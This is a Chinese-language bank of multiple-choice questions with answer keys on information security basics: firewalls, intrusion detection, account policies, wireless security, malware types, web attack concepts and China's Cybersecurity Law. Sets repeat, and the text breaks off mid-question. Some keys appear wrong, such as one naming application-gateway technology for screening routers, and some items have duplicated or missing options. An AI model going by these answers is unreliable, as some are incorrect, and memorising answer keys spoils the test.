5、_____是一个预先定义的电子邮件地址列表,用户可以接收来自该列表中地址的邮件。

A、 僵尸网络

B、 黑名单blacklist

C、 白名单whitelist

D、 干净列表

标准答案: C

6、 硬件防火墙常见的性能参数不包含( )

A、 吞吐量

B、 最大并发连接数

C、 每秒新建会话连接数

D、 背板带宽

标准答案: D

7、 通常硬件防火墙设备不包含哪种物理接口( )

A、 以太网电口

B、 SFP/GBIC光接口

C、 Console口

D、 AUX接口

标准答案: D

8、在一个新组建的运行正常的网络中,如果只允许内网的某些客户可以访问互联网,内网的某些服务器可以被互联网上的用户访问,要在网络中再次部署哪种设备( )

A、 防病毒过滤网关

B、 IDS

C、 流量控制设备

D、 防火墙

标准答案: D

9、下列说法中,关于包过滤防火墙和应用层代理防火墙的描述错误的是______。

A、 包过滤防火墙必须和路由器在同一个设备中实现才能够保障安全

B、 应用层代理防火墙能使内网用户访问常用网站的速度加快

C、 包过滤通常在传输层以下实现,应用层代理通常在会话层以上实现

D、 应用层代理防火墙能够提供用户认证

标准答案: A

10、硬件防火墙常见的性能参数不包含______

A、 吞吐量

B、 最大并发连接数

C、 每秒新建会话连接数

D、 背板带宽

标准答案: D

11、屏蔽路由器型防火墙采用的技术是基于( )

A、 数据包过滤技术

B、 应用网关技术

C、 代理服务技术

D、 三种技术的结合

标准答案: B

12、______可在分组到达网络边界时进行过滤,从而压制网络攻击。

A、 网卡适配器

B、 路由器

C、 防火墙

D、 网络连接存储NAS

标准答案: C

13、当发现网页被篡改或信息系统主机已被入侵,应首先( )

A、 将被攻击设备从网络中隔离出来

B、 立即向信息系统主管部门负责人报告

C、 查看利用了哪些漏洞实施的攻击

D、 立即恢复信息系统的正常使用

标准答案: A

14、小王是公司的网络管理员,为了监听络中存在的攻击,达到最好的监听,监听设备不应放在______

A、 网关

B、 路由器

C、 中继器

D、 防火墙

标准答案: C

15、拒绝服务攻击可能造成的危害______

A、 提升权限

B、 导致系统服务不可用

C、 进行挂马

D、 植入病毒

标准答案: B

16、入侵检测系统在进行信号分析时,一般通过三种常用的技术手段,以下哪一种不属于通常的三种技术手段( )

A、 模式匹配

B、 统计分析

C、 完整性分析

D、 密文分析

标准答案: D

17、 基于网络的入侵检测系统的信息源是( )

A、 系统的审计日志

B、 系统的行为数据

C、 应用程序的事务日志文件

D、 网络中的数据包

标准答案: D

18、以下选项中,()不属于访问控制范畴。

A、 强制

B、 自主

C、 文件按名访问

D、 基于角色

标准答案: C

19、PDRR一般是指信息安全保障中的____等主要环节。

A、 策略、保护、响应、恢复

B、 加密、认证、保护、检测

C、 策略、网络攻防、密码学、备份

D、 保护、检测、响应、恢复

标准答案: D

20、公司为了防范内部攻击,下列选项哪个是最好的实施控制措施( )

A、 确保有全面的攻击事件响应计划

B、 为重要系统记录所有的用户活动

C、 对所有的员工或承包商进行犯罪背景检查

D、 根据个人工作职责需要限制访问权

标准答案: D

21、 Windows紧急修复盘不能修复下列哪个项目( )

A、 硬件兼容问题

B、 分区引导扇区

C、 启动环境

D、 系统文件

标准答案: A

22、匿名登录FTP服务器使用的账户名是(

A、 anyone

B、 anonymous

C、 everone

D、 guest

标准答案: B

23、在Windows系统中下列账户不是合法账户的是

A、 abcABC

B、 abc_123

C、 abc123$

D、 abc123*

标准答案: D

24、在设置域账户属性时,( )项策略是不能被设置的

A、 账户登录时间

B、 账户个人信息

C、 账户的权限

D、 指定账户登录域的计算机

标准答案: C

25、Windows系统中权限最高为

A、 administrators

B、 power users

C、 guests

D、 system

标准答案: D

26、 对于企业网络中划分的DMZ区域而言,正确的是( )

A、 DMZ是一个真正可信的网络部分

B、 DMZ网络访问控制策略决定允许或禁止进入DMZ通信

C、 允许外部用户访问DMZ系统上合适的服务

D、 以上三项都是

标准答案: D

27、当用户登录自己电脑时显示错误信息“ 网络中存在重名”,登录后应该( )

A、 打开控制面板中的“系统”工具,修改网络标识中的计算机名

B、 打开“本地连接”属性对话框,修改IP地址

C、 打开管理工具的“本地用户和组”,修改用户名

D、 需要重新安装操作系统

标准答案: A

28、公司为了防范内部攻击,下列选项哪个是最好的实施控制措施______

A、 确保有全面的攻击事件响应计划

B、 为重要系统记录所有的用户活动

C、 对所有的员工或承包商进行犯罪背景检查

D、 根据个人工作职责需要限制访问权

标准答案: D

29、Windows系统中权限最高为______

A、 administrators

B、 power users

C、 guests

D、 system

标准答案: D

30、在Linux系统中,修改口令策略和查看某个用户的口令策略分别是对如下哪两个文件进行操作( )

A、 /etc/login.defs和/etc/shadow

B、 /etc/login.defs和/etc/passwd

C、 /etc/passwd和/etc/shadow

D、 /etc/shadow和/etc/login

标准答案: A

31、可以通过配置_____来防止用户通过多次登录尝试来猜测其他人的密码

A、 密码策略

B、 账户锁定策略

C、 Kerberos策略

D、 审计策略

标准答案: B

32、无线局域网网络标准IEEE802.11的用户认证机制有( )

A、 Open key

B、 Pre-Shared Key authentication

C、 Shared Key authentication

D、 MAC authentication

标准答案: C

33、通过计算机网络给乙发消息,说其同意签定合同。随后甲反悔,不承认发过该条消息。为了防止这种情况发生,应在计算机网络中采用______。

A、 消息认证技术

B、 数据加密技术

C、 防火墙技术

D、 数字签名技术

标准答案: D

34、防止用户被冒名所欺骗的方法是______

A、 对信息源发方进行身份验证

B、 进行数据加密

C、 对访问网络的流量进行过滤和保护

D、 采用防火墙

标准答案: A

35、提供证据表明用户身份真实性的过程称作______。

A、 标识

B、 注册

C、 真实性验证

D、 身份认证

标准答案: D

36、可以被数据完整性机制防止的攻击方式是______

A、 假冒源地址或用户的地址欺骗攻击;

B、 抵赖做过信息的递交行为;

C、 数据中途被攻击者窃听获取;

D、 数据在途中被攻击者篡改或破坏

标准答案: D

37、下列概念中,不能用于身份认证的手段是______。

A、 限制地址和端口

B、 用户名和口令

C、 杀毒软件

D、 智能卡

标准答案: C

38、在一个信息系统的多级密钥体系中,主密钥应该以()形式存在于()中

A、 明文 开放环境

B、 密文 开放环境

C、 明文 安全环境

D、 密文 安全环境

标准答案: C

39、______的概念不完全属于安全范畴。

A、 可用性,机密性,权力分散

B、 匿名性,可生存性,入侵容忍

C、 可审查性,兼容性,防抵赖

D、 完整性,可仲裁性,抗监听

标准答案: C

40、下列选项中,与人机安全交互无关的是______。

A、 情绪和思维

B、 有线网和无线网

C、 声音和视频

D、 手势和表情

标准答案: B

41、近期有曝光,黑客可利用部分显示设备固件缺陷,修改显示信息,这破坏了信息安全的()属性

A、 机密性

B、 完整性

C、 不可否认性

D、 可用性

标准答案: B

42、CIA三元组指的是______。

A、 机密性,完整性,可用性

B、 真实性,完整性,可控性

C、 机密性,真实性,可用性

D、 完整性,可用性,可控性

标准答案: A

43、当文件长度小于500字节时,NTFS把该文件存放在_________。

A、 单独的簇中

B、 文件目录区

C、 MFT中FR中

D、 文件的索引区

标准答案: C

44、为了便于磁盘管理,常把磁盘分为单个的小分区,把这些分区组织起来的结构为_______。

A、 B+树

B、 单向链表

C、 双向链表

D、 队列

标准答案: B

45、 计算机机房灭火使用的是( )

A、 二氧化碳

B、 干粉

C、 七氟丙烷

D、 水

标准答案: C

46、关于计算机机房防静电说法错误的是( )

A、 采用防静电地板;工作人员要求穿着防静电的衣服和鞋袜进入机房工作

B、 室内保持相对湿度允许范围为:45%一65%;计算机与地板有效接地

C、 安装屏蔽材料

D、 机房中办公设备或辅助设备材料应尽量采用产生静电少的材料制作的

标准答案: C

47、 网络准入控制主要组件不包含( )

A、 终端安全检查软件

B、 网络接入设备(接入交换机和无线访问点)

C、 策略/AAA服务器

D、 堡垒主机

标准答案: D

48、以下关于Windows服务器操作系统的特点,说法不正确的是( )

A、 允许在X86架构下硬件平台上安装和使用,能够支持各种网络协议和网络服务

B、 提供必要的网络连接支持,能够连接不同的网络

C、 能够进行系统安全性保护和用户存取权限的控制

D、 具有一定的可扩展性、可用性及易管理性

标准答案: D

49、应急事件分级的依据有哪些( )

A、 事件影响范围和业务重要程度

B、 应急事件类型

C、 应急预案启动的级别

D、 事件分析分析和评估

标准答案: A

50、从信息系统安全角度来看,用于IT项目的业务模板(或案例)文档应该被保留,其保留期为( )

A、 系统的生命周期结束

B、 项目获得批准

C、 用户验收

D、 系统被投入生产

标准答案: A

1、快照技术是一种在线方式的数据保护策略,说法错误的是( )

A、 .基于文件系统

B、 基于卷管理器

C、 基于虚拟化

D、 基于目录

标准答案: D

2、下面关于SSID说法错误的是( )

A、 通过对多个无线接入点AP设置不同的SSID,并要求无线工作站出示正确的SSID才能访问AP

B、 提供了40位和128位长度的密钥机制

C、 只有设置为名称相同SSID的值的电脑才能互相通信

D、 SSID就是一个局域网的名称

标准答案: C

3、 物联网是一种虚拟网络与现实世界实时交互的新型系统,关于特点描述错误的是( )

A、 无处不在的数据感知

B、 以无线为主的信息传输

C、 智能化的信息处理

D、 以物理网传输为主干网

标准答案: D

4、 关于数据备份策略的分类,说法错误的是( )

A、 按照备份的数据量可以分为完全备份、增量备份、差异备份

B、 完全备份所需时间最长,恢复所需时间最短

C、 差异备份节省了磁盘空间,但备份时间比较长

D、 增量备份只备份与前一次相比增加或者被修改的文件、数据

标准答案: C

5、 以下哪一项不是物联网的安全问题( )

A、 感知层安全问题

B、 传输层安全问题

C、 系统层安全问题

D、 应用层安全问题

标准答案: C

6、 将单位内部的局域网接入Internet(因特网)所需使用的接入设备是______。

A、 安全审计设备

B、 集线器

C、 路由器

D、 中继转发器

标准答案: C

7、下列关于Android的描述正确的是______。

A、 默认不支持对APP的权限进行限制,所以比iOS的安全性差

B、 默认不能安装配套市场以外的APP,但是经过用户授权后可以安装

C、 在屏幕被锁定时,默认不允许拨打任何电话号码

D、 即使被种植了木马,只要屏幕不解锁,木马也不能执行

标准答案: B

8、Rootkit的主要目标是______。

A、 隐藏其存在

B、 重新格式化硬盘

C、 复制到其他计算机

D、 启动僵尸网络

标准答案: A

9、计算机病毒有很多种类型,但不包括______。

A、 文件感染类病毒

B、 远程病毒

C、 内存驻留病毒

D、 引导区病毒

标准答案: B

10、钓鱼攻击具有下列选项中除了______以外的所有特点。

A、 欺骗性Web链接

B、 真实的发送方地址

C、 一般性的问候

D、 要求采取行动的紧急请求

标准答案: B

11、下列攻击行为不属于主动性攻击的是( )

A、 拒绝服务攻击(DOS)

B、 中间人攻击(MITM)

C、 网络钓鱼攻击(Phishing)

D、 社会工程学攻击

标准答案: C

12、下列选项中,除了______以外都是杀毒软件发现病毒时的可选项。

A、 清除文件中的病毒

B、 隔离被感染文件

C、 发送邮件告诉攻击者病毒已暴露

D、 删除包含病毒的文件

标准答案: C

13、下列设备中,可隔绝广播风暴的是______

A、 路由器

B、 MODEM

C、 集线器

D、 交换器

标准答案: A

14、关于无线局域网,下面叙述中正确的是( )

A、 802.11a 和02.11b可以在 2.4GHz 频段工作

B、 802.11b 和 802.11g 都可以在 2.4GHz 频段工作

C、 802.11a 和 802.11b 都可以在 5GHz 频段工作

D、 802.11b 和 802.11g 都可以在 5GHz 频段工作

标准答案: B

15、WEP协议的设计目标是:保障数据______。

A、 不可抵赖性

B、 匿名性

C、 抗干扰性

D、 完整性和机密性

标准答案: D

16、从加密类型分析,当无线路由器WIFI密码安全类型为______时,最容易破解

A、 WPA2-PSK

B、 WEP

C、 WPA-PSK

D、 WPA

标准答案: B

17、 从不同厂家购买安全产品,希望一家产品的安全失效不会影响整个系统的安全性,这是利用______来提升安全性。

A、 模糊性

B、 纵深防御

C、 限制性

D、 多样性

标准答案: D

18、试图阻止无线监听但又包含严重缺陷,现在不应再使用的标准是______。

A、 WEP

B、 WAP-2

C、 NICW

D、 INFOMATICS

标准答案: A

19、SSID(Service Set Identifier)______。

A、 是无线网络标识符

B、 不能改变

C、 从不因任何安全原因由无线路由器发送

D、 在有线网络上必须少于4个字符

标准答案: A

20、 保护无线网络的第一步是______。

A、 创建用户名和口令,禁止非法用户访问无线路由器

B、 禁用无线路由器网络共享

C、 使用IP地址过滤

D、 取消非军事区

标准答案: A

21、我们通常所说的10Mb/s和100Mb/s自适应是指

A、 既工作在10Mb/s,同时也工作在100Mb/s

B、 端口之间10Mb/s和100Mb/s传输率的自动匹配功能

C、 既可工作在10Mb/s,也可工作在100Mb/s

D、 其他三项都是

标准答案: B

22、下列设备中,可隔绝广播风暴的是(

A、 路由器

B、 MODEM

C、 集线器

D、 交换器

标准答案: A

23、无线局域网网络标准IEEE802.11的用户认证机制有______

A、 Open key

B、 Pre-Shared Key authentication

C、 Shared Key authentication

D、 MAC authentication

标准答案: C

24、下列方法中,识别Email来源真实性最可靠的是______。

A、 查看发件服务器地址

B、 查看发件人名称

C、 查看发件人地址

D、 查看回信地址

标准答案: A

25、在需要保护的信息资产中____是最重要的

A、 环境

B、 硬件

C、 数据

D、 软件

标准答案: C

26、来自于多个攻击源而不是单一攻击源的攻击,称作______攻击。

A、 分布式

B、 隔离

C、 脚本资源恶意软件

D、 表格资源

标准答案: A

27、DNS属于______协议

A、 应用层

B、 会话层

C、 表示层

D、 数据链路层

标准答案: A

28、浏览器能够打开百度的主页而不能打开必应主页,下列描述肯定错误的是______。

A、 由于ISP限制了IP访问策略

B、 系统遭受了DNS欺骗

C、 浏览器语言设置有误

D、 由于ISP限制了URL访问策略

标准答案: C

29、DNS属于( )协议

A、 应用层

B、 会话层

C、 表示层

D、 数据链路层

标准答案: A

30、 ORACLE数据库不需要使用( )结构来保护数据

A、 数据文件

B、 控制文件

C、 日志

D、 回滚段

标准答案: A

31、为了保证数据库的安全,可采取的措施有误的是( )

A、 自主访问控制

B、 资源控制

C、 安全审计

D、 数据加密

标准答案: B

32、输入正确的域名但却被转换为错误的IP地址,从而将用户指向其他目标网站,用以提高目标网站的访问量,这种攻击是( )

A、 ARP欺骗

B、 DNS欺骗

C、 会话劫持

D、 社交攻击

标准答案: B

33、在进行网络攻击时,隐藏攻击者较好的方法是______。

A、 采用匿名登录

B、 关闭对方的防火墙

C、 使用跳板攻击

D、 以管理员的身份登录

标准答案: C

34、DoS攻击不会破坏的是______。

A、 账户的授权

B、 合法用户的使用

C、 服务器的处理器资源

D、 网络设备的带宽资源

标准答案: A

35、在TCP/IP参考模型中,应用层是最高的一层,它包括了所有的高层协议。下列协议中不属于应用层协议的是_______

A、 HTTP

B、 FTP

C、 UDP

D、 SMTP

标准答案: C

36、TCP协议一般用于______网,向用户提供一种传输可靠的服务

A、 局域网

B、 以太网

C、 广域网

D、 城域网

标准答案: C

37、Tracert命令通过多次向目标发送( )来确定到达目标的路径,在连续发送的多个IP数据包中,TTL字段都是不同的。

A、 ICMP地址请求报文

B、 ARP请求报文

C、 ICMP回声请求报文

D、 ARP响应报文

标准答案: C

38、下列不涉及OSI网络安全体系范畴的是______。

A、 网闸在任意一个具体时刻都不存在内网与外网的物理链路

B、 防火墙中通常集成有对抗DDoS功能

C、 蠕虫的传播主要依赖于对系统漏洞的利用

D、 HTTPS使用了与HTTP不同的传输端口

标准答案: C

39、日前,戴尔的安全威胁应对小组(CTU)检测到一个巨大的针对美国、欧盟、俄罗斯和前苏联国家的军事人员、政府官员、记者和政治活动家的谷歌账户的网络钓鱼活动,该钓鱼活动由俄罗斯APT组织发起。网络钓鱼是属于______的攻击。

A、 网络层

B、 传输层

C、 数据链路层

D、 应用层

标准答案: D

40、帧中继(Frame Relay)交换是以帧为单位进行交换,它是在( )上进行的。

A、 物理层

B、 数据链路层

C、 网络层

D、 运输层

标准答案: B

41、 某业务数据库每周六凌晨进行全库备份,每个工作日凌晨采用增量备份方式,如果想得到周二凌晨的数据库数据,以下还原过程正确的是( )

A、 还原周六的全库备份

B、 还原周六的全库备份,还原周一的增量备份,还原周二的增量备份

C、 还原周六的全库备份,还原周二的增量备份

D、 附加周二的增量备份

标准答案: B

42、 RAID技术能够使得多硬盘读取速度加快及提供一定的容错性,以下读写性能最优且有数 据安全保障的RAID方式是( )

A、 RAID 0

B、 RAID 1

C、 RAID 5

D、 RAID 0+1

标准答案: D

43、保护信息不被偶然或蓄意地删除、修改、伪造、乱序、重放、插入等破坏的属性指的是______。

A、 保密性

B、 完整性

C、 可用性

D、 可靠性

标准答案: B

44、定期对系统和数据进行备份,在发生灾难时进行恢复。该机制是为了满足信息安全的________属性。

A、 保密性

B、 完整性

C、 不可否认性

D、 可靠性

标准答案: D

45、下列选项中______不是灾难恢复计划的特点。

A、 仅允许首席安全官访问

B、 书面的

C、 详细的

D、 定期更新的

标准答案: A

46、信息安全中的木桶原理,是指____

A、 整体安全水平由安全级别最低的部分所决定

B、 整体安全水平由安全级别最高的部分所决定

C、 整体安全水平由各组成部分的安全级别平均值所决定

D、 以上都不对

标准答案: A

47、下列关于预防网络攻击的说法正确的是( )

A、 网站服务器操作系统和 个人电脑 操作系统具有可以信赖的默认安全设置。

B、 入侵防御系统可以记录可疑的网络活动,但在没有用户干预的情况下无法对抗正在进行的攻击。

C、 物理安全威胁的防范包括控制对设备控制台端口的访问、标识关键电缆、安装 UPS 系统以及提供温湿控制。

D、 防止网络钓鱼攻击的最好方法是多采用防火墙设备。

标准答案: C

48、网络管理的功能有_______

A、 性能分析和故障检测

B、 安全性管理和计费管理

C、 网络规划和配置管理

D、 以上都是

标准答案: D

49、信息安全管理最关注的是_____

A、 外部恶意攻击

B、 病毒对PC的影响

C、 内部恶意攻击

D、 病毒对网络的影响

标准答案: C

50、在信息系统安全中,风险由______两种因素共同构成的。

A、 攻击和脆弱性

B、 威胁和攻击

C、 威胁和脆弱性

D、 威胁和破坏

标准答案: C

1、如果想要限制用户过多的占用磁盘空间,应当______

A、 设置磁盘配额

B、 设置数据压缩

C、 设置文件加密

D、 设置动态存储

标准答案: A

2、当用户登录自己电脑时显示错误信息“ 网络中存在重名”,登录后应该______

A、 打开控制面板中的“系统”工具,修改网络标识中的计算机名

B、 打开“本地连接”属性对话框,修改IP地址

C、 打开管理工具的“本地用户和组”,修改用户名

D、 需要重新安装操作系统

标准答案: A

3、Windows紧急修复盘不能修复下列哪个项目______

A、 硬件兼容问题

B、 分区引导扇区

C、 启动环境

D、 系统文件

标准答案: A

4、当安装完Windows操作系统后,在系统盘里会出现“pagefile.sys”隐藏文件,且文件占用空间较大,此文件的作用是______

A、 物理内存

B、 EPROM

C、 ROM

D、 虚拟内存

标准答案: D

5、个人电脑中使用netstat命令查看进程识别符(PID)配合资源管理器查看是否有病毒等恶意进程与外界非法通讯,netstat命令需要配合增加的参数是(

A、 netstat -a

B、 netstat -s

C、 netstat -o

D、 netstat –ano

标准答案: D

6、单位出于安全考虑对内部地址做动态网络地址转换(NAT),不正确的说法是( )

A、 将很多内部地址映射到单个真实地址

B、 外部网络地址和内部地址一对一的映射

C、 最多可有64000个同时的动态NAT连接

D、 每个连接使用一个端口

标准答案: B

7、下列说法中不正确的是( )

A、 各信息系统运营使用单位和主管部门是信息系统定级的责任主体

B、 在安全评估过程中,采用渗透性测试手段,检测系统脆弱性

C、 信息系统的等级应由业务信息系统和服务系统的较高者决定

D、 信息保密性可分为秘密和机密两个等级

标准答案: D

8、定期对系统和数据进行备份,在发生灾难时进行恢复。该机制是为了满足信息安全的( )属性

A、 保密性

B、 完整性

C、 抗抵赖性

D、 可用性

标准答案: D

9、 对于信息安全管理负有责任的是( )

A、 高级管理层

B、 安全管理员

C、 IT管理员

D、 所有与信息系统有关人员

标准答案: D

10、重要安全区域部署安全审计跟踪的是( )

A、 安全审计系统检测并追踪安全事件的过程

B、 安全审计系统收集易于安全审计的数据

C、 人利用日志信息进行安全事件分析和追溯的过程

D、 对计算机系统中的某种行为的详尽跟踪和观察

标准答案: A

11、是企业信息安全的核心( )

A、 安全教育

B、 安全运维措施

C、 安全管理

D、 安全软硬件设施

标准答案: C

12、计算机机房应当符合( )和国家有关规定

A、 防火、防盗、防潮、防尘要求

B、 楼层、位置要求

C、 相关行业标准

D、 国家标准

标准答案: D

13、 网络安全在多网合一时代的脆弱性主要体现在( )

A、 软件的脆弱性

B、 网络的脆弱性

C、 管理的脆弱性

D、 应用的脆弱性

标准答案: C

14、以下哪种不是主机连接存储的常见方式______

A、 DAS

B、 NAS

C、 SAN

D、 IAS

标准答案: D

15、网络扫描器不可能发现的是______。

A、 用户的弱口令

B、 系统的服务类型

C、 系统的版本

D、 用户的键盘动作

标准答案: D

16、HOOK是安全防护软件及恶意软件经常用到劫持技术,将目标函数代码的前面几个字节替换为指向目标代码的跳转指令的技术为()。

A、 EAT HOOK

B、 IAT HOOK

C、 Inline HOOK

D、 IDT HOOK

标准答案: C

17、()破解了英格玛机?

A、 牛顿

B、 图灵

C、 比尔盖茨

D、 赫敏

标准答案: B

18、“进不来” “拿不走” “看不懂” “改不了” “走不脱”是网络信息安全建设的目的。其中,“看不懂”是指下面那种安全服务:

A、 数据加密

B、 身份认证

C、 数据完整性

D、 访问控制

标准答案: A

19、______用于描述损害用户个人信息安全的软件。

A、 间谍软件Spyware

B、 恶意软件Malware

C、 广告软件Ad ware

D、 网络操作系统Netware

标准答案: B

20、______是攻击者安装在计算机上的程序,它篡改Web浏览器的主页和搜索引擎将其指向其它站点。

A、 IE重定位器

B、 互联网服务器重定位器

C、 IMAPI

D、 浏览器劫持软件

标准答案: D

21、以下哪个恶意软件具备穿透还原卡和还原软件的能力?

A、 求职信

B、 求职信

C、 超级工厂

D、 CIH

标准答案: B

22、相比之下,______最不可能隐藏恶意代码。

A、 图片文件

B、 证书文件

C、 MBR

D、 PE文件

标准答案: B

23、攻击者为了使恶意软件具有较长的生命周期,通常需要对其进行免杀处理。这种免杀处理主要是对抗()。

A、 特征码检测

B、 虚拟机

C、 启发式扫描

D、 主动防御

标准答案: A

24、下列对XSS攻击(跨站脚本攻击)描述正确的是______

A、 XSS攻击指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中的html代码会被执行,从而达到恶意攻击用户的特殊目的

B、 XSS攻击是DDOS攻击的一种变种

C、 XSS攻击就是CC攻击

D、 XSS攻击就是利用被控制的机器不断地向被攻击网站发送访问请求,迫使IIS 连接数超出限制,当CPU 资源或者带宽资源耗尽,那么网站也就被攻击垮了,从而达到攻击目的

标准答案: A

25、业务系统在开发过程中植入参数过滤策略可以预防______攻击

A、 SQL注入、跨站脚本、DNS毒药

B、 SQL注入、跨站脚本、缓冲区溢出

C、 SQL注入、跨站请求伪造、网络窃听

D、 跨站请求伪造、跨站脚本、DNS毒药

标准答案: B

26、APT对抗中,整个环节最关键也是最薄弱的一环是:

A、 技术

B、 人

C、 策略

D、 管理制度

标准答案: B

27、业务系统在开发过程中植入参数过滤策略可以预防( )攻击

A、 SQL注入、跨站脚本、DNS毒药

B、 SQL注入、跨站脚本、缓冲区溢出

C、 SQL注入、跨站请求伪造、网络窃听

D、 跨站请求伪造、跨站脚本、DNS毒药

标准答案: B

28、缓冲区溢出攻击针对的目标对象是( )

A、 只是应用层漏洞

B、 只是系统层漏洞

C、 既是系统层漏洞也是应用层漏洞

D、 硬件层漏洞

标准答案: C

29、还未公开的漏洞,称作______漏洞。

A、 未识别攻击向量

B、 资源

C、 不确定

D、 零日

标准答案: D

30、______是指有能力带来威胁的人或事物

A、 漏洞

B、 威胁代理

C、 漏洞利用

D、 风险因子

标准答案: B

31、有人通过朋友圈分享要求他人转发不良信息,否则进行恶毒诅咒。对此应______。

A、 转发信息,不过是手指动一下,转不转全看心情。

B、 此类信息一般没有积极意义,常常涉嫌人身攻击等,不应转发。

C、 涉及个人和家人安危,宁信其有不信其无,不愿意也要转。

D、 直接转发,不多考虑。

标准答案: B

32、正向型和反弹型木马的区别是______。

A、 正向型木马的控制端可以在Internet上使用,而反弹性木马的控制端只能在内网中使用

B、 反弹性木马的控制端可以在Internet上使用,而正向型木马的控制端只能在内网中使用

C、 反弹性木马的受控端可以在内网中使用,而正向型木马的受控端只能在Internet上使用

D、 正向型木马的受控端可以在内网中使用,而反弹性木马的受控端只能在Internet上使用

标准答案: C

33、快照技术是一种在线方式的数据保护策略,说法错误的是______

A、 基于文件系统

B、 基于卷管理器

C、 基于虚拟化

D、 基于目录

标准答案: D

34、该用户希望U盘中的所有可执行程序均无法运行。那么,其最合适的安全规则是()。

A、 路径规则

B、 Internet区域规则

C、 证书规则

D、 散列规则

标准答案: A

35、RAID技术能够使得多硬盘读取速度加快及提供一定的容错性,以下读写性能最优且有数 据安全保障的RAID方式是_____

A、 RAID 0

B、 RAID 1

C、 RAID 5

D、 RAID 0+1

标准答案: D

36、定期对系统和数据进行备份,在发生灾难时进行恢复。该机制是为了满足信息安全的________属性。

A、 保密性

B、 完整性

C、 不可否认性

D、 可用性

标准答案: D

37、保护信息不被偶然或蓄意地删除、修改、伪造、乱序、重放、插入等破坏的属性指的是______。

A、 保密性

B、 完整性

C、 可用性

D、 可靠性

标准答案: B

38、访问网址www.1cbc.com.cn,将可能遭受______攻击?

A、 缓冲区溢出攻击

B、 钓鱼攻击

C、 SQL注入攻击

D、 拒绝服务攻击

标准答案: B

39、无线拒绝服务攻击______。

A、 与有线拒绝服务攻击功能相同

B、 由于其低效性较少被攻击者使用

C、 用于拒绝无线设备访问无线路由器

D、 使用“切断关联”帧来连接到有线网络

标准答案: C

40、当成百上千计算机被远程控制时就形成了______。

A、 僵尸网络

B、 爬虫网络

C、 木马网络

D、 暗网

标准答案: A

41、以通过发现漏洞来提升安全性为目标的黑客,被称作______。

A、 黑帽子黑客

B、 白帽子黑客

C、 牛仔攻击者

D、 资源攻击者

标准答案: B

42、下列哪一项信息不包含在X.509规定的数字证书中?

A、 证书有效期;

B、 证书持有者的公钥;

C、 证书颁发机构的签名;

D、 证书颁发机构的私钥

标准答案: D

43、服务器数字证书能验证组织的存在性和身份,并支持对通信内容的加密。访问带有服务器数字证书的网站时,浏览器会显示______。

A、 绿色复选标记

B、 锁

C、 蓝色地球

D、 计算机

标准答案: B

44、信息安全中的木桶原理,是指____。

A、 整体安全水平由安全级别最低的部分所决定

B、 整体安全水平由安全级别最高的部分所决定

C、 整体安全水平由各组成部分的安全级别平均值所决定

D、 以上都不对

标准答案: A

45、在Windows系统中______是最小运行单位

A、 进程

B、 线程

C、 服务

D、 程序

标准答案: B

46、Windows平台的可执行文件格式是()。

A、 TXT

B、 PE

C、 ELF

D、 PPT

标准答案: B

47、Windows操作系统便于对动态内存进行管理,设计了堆的空表,空表采用的结构为_______。

A、 B+树

B、 队列

C、 单向链表

D、 双向链表

标准答案: D

48、在缓冲区溢出漏洞攻击中,为了获得目标系统控制权,通常需要一个程序来构造溢出,修改返回地址进而去执行一段攻击者给出的代码,该代码通常被称为________。

A、 ShellCode

B、 Exploit

C、 Metasploit

D、 HackTool

标准答案: A

49、Windows系统会默认创建还原点,该功能主要是为了( ),以防出现意外情况导致数据丢失。

A、 杀毒

B、 加密

C、 备份

D、 格式化

标准答案: C

50、使用nslookup命令查询网址的MX记录,preference数字越小代表优先级低,越大优先级越高。()

A、 对

B、 错

标准答案: B

1、当成百上千计算机被远程控制时就形成了______。

A、 僵尸网络

B、 爬虫网络

C、 木马网络

D、 暗网

标准答案: A

2、以通过发现漏洞来提升安全性为目标的黑客,被称作______。

A、 黑帽子黑客

B、 白帽子黑客

C、 牛仔攻击者

D、 资源攻击者

标准答案: B

3、下列哪一项信息不包含在X.509规定的数字证书中?

A、 证书有效期;

B、 证书持有者的公钥;

C、 证书颁发机构的签名;

D、 证书颁发机构的私钥

标准答案: D

4、服务器数字证书能验证组织的存在性和身份,并支持对通信内容的加密。访问带有服务器数字证书的网站时,浏览器会显示______。

A、 绿色复选标记

B、 锁

C、 蓝色地球

D、 计算机

标准答案: B

5、信息安全中的木桶原理,是指____。

A、 整体安全水平由安全级别最低的部分所决定

B、 整体安全水平由安全级别最高的部分所决定

C、 整体安全水平由各组成部分的安全级别平均值所决定

D、 以上都不对

标准答案: A

6、在Windows系统中______是最小运行单位

A、 进程

B、 线程

C、 服务

D、 程序

标准答案: B

7、Windows平台的可执行文件格式是()。

A、 TXT

B、 PE

C、 ELF

D、 PPT

标准答案: B

8、Windows操作系统便于对动态内存进行管理,设计了堆的空表,空表采用的结构为_______。

A、 B+树

B、 队列

C、 单向链表

D、 双向链表

标准答案: D

9、在缓冲区溢出漏洞攻击中,为了获得目标系统控制权,通常需要一个程序来构造溢出,修改返回地址进而去执行一段攻击者给出的代码,该代码通常被称为________。

A、 ShellCode

B、 Exploit

C、 Metasploit

D、 HackTool

标准答案: A

10、Windows系统会默认创建还原点,该功能主要是为了( ),以防出现意外情况导致数据丢失。

A、 杀毒

B、 加密

C、 备份

D、 格式化

标准答案: C

11、使用nslookup命令查询网址的MX记录,preference数字越小代表优先级低,越大优先级越高。()

A、 对

B、 错

标准答案: B

12、《中华人民共和国网络安全法》从哪天正式施行?()

A、 2017年6月1日

B、 2017年6月2日

C、 2017年6月3日

D、 2017年6月4日

标准答案: A

13、以下哪个不是新时代我们面临的网络危险?()

A、 木马

B、 大数据

C、 病毒

D、 僵尸网络

标准答案: B

14、第一次网络战争是那个国家遭到攻击?()

A、 乌克兰

B、 爱沙尼亚

C、 罗马尼亚

D、 土耳其

标准答案: B

15、“互联网”+行动计划是否起到了对传统产业升级的推动作用?

A、 是

标准答案: A

16、有关网安治理的顶层设计不包括那项?()

A、 网络安全法

B、 电子商务法

C、 电信法

D、 个人财产保护法

标准答案: D

17、《中华人民共和国网络安全法》发布时间是?()

A、 2017年6月1日

B、 2016年6月1日

C、 2016年11月7日

D、 2017年5月1日

标准答案: C

18、网络安全法是基于信息化的时代要求。

A、 是

标准答案: A

19、网络安全法是由几个原因促成的?()

A、 1

B、 2

C、 3

D、 4

标准答案: C

20、网络安全法共有多少条目?()

A、 49

B、 59

C、 69

D、 79

标准答案: D

21、从网络安全法本身看,什么是网络安全?()

A、 一种能力

B、 一种服务

C、 一种态度

D、 一种精神

标准答案: A

22、以下哪个不是数据的三性原则?()

A、 完整性

B、 再生性

